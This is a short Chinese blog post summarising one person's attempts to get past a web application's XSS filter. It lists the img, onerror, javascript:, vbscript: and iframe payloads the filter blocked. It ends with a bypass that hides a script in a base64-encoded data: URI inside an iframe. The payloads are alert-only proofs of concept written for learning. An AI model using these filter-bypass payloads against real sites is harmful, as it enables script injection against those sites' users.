xxs-绕过总结

朝花夕拾

这是在圈子社区里发现的一篇文章,希望看到文章的人可以加入圈子社区!真的很赞

下次看不一定能点开,所以将内容总结一下
使用探测语句
<img src=0>
img

通过burpsuite抓包测试

编码后:

%3Cimg+src%3D%22javascript%3Aalert('XSS1')%22%3E

编码前:
<img src="javascript:alert('XSS2')">

0x01

空格用+来表示吧 <img+src=0>

虽然是空的,但是发现源码中是存在img的但是被转义了,还是有些转机的^_^

来尝试绕过转义%00 代替空格 <img%00src=0%00> 不行

继续使用 <img#src=0> 原样输出

再使用 <img\/src=0>

img

有转机啊!可以看到 / 被转移成空格了

0x02

直接上 <img/src=0/onerror=alert(/xss3/)>

img

可惜,被拦截了,应该是关键字alert接触()就拦截,onerror接触=就拦截绕过一下,加空格和 %00 会被转义,试着用 / 来空格,alerttop['alert']来代替但是!不顶用啊

0x03

用过 /**/ %00 大小写 eval 等 常用的都被干掉了,结束了?!这不一定要用 <img> 啊,来试试 <iframe>

img

img

接下来直接上吧,script标签肯定用不了了

试试 <iframe/src=vbscript:msgbox(123)></iframe>

img

能写进去但是好像执行不了,继续绕

0x04

试了各种绕的方法,突然想到 明着不行,那就来暗的

明码不行,那就试试base64编码后的看看它会拦截不

编码一下

img

来直接上Payload <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></iframe>

img

img

img

成功了!

-------------本文结束感谢您的阅读-------------
各位帅哥,美女!有人捧个人场,有钱捧个钱场!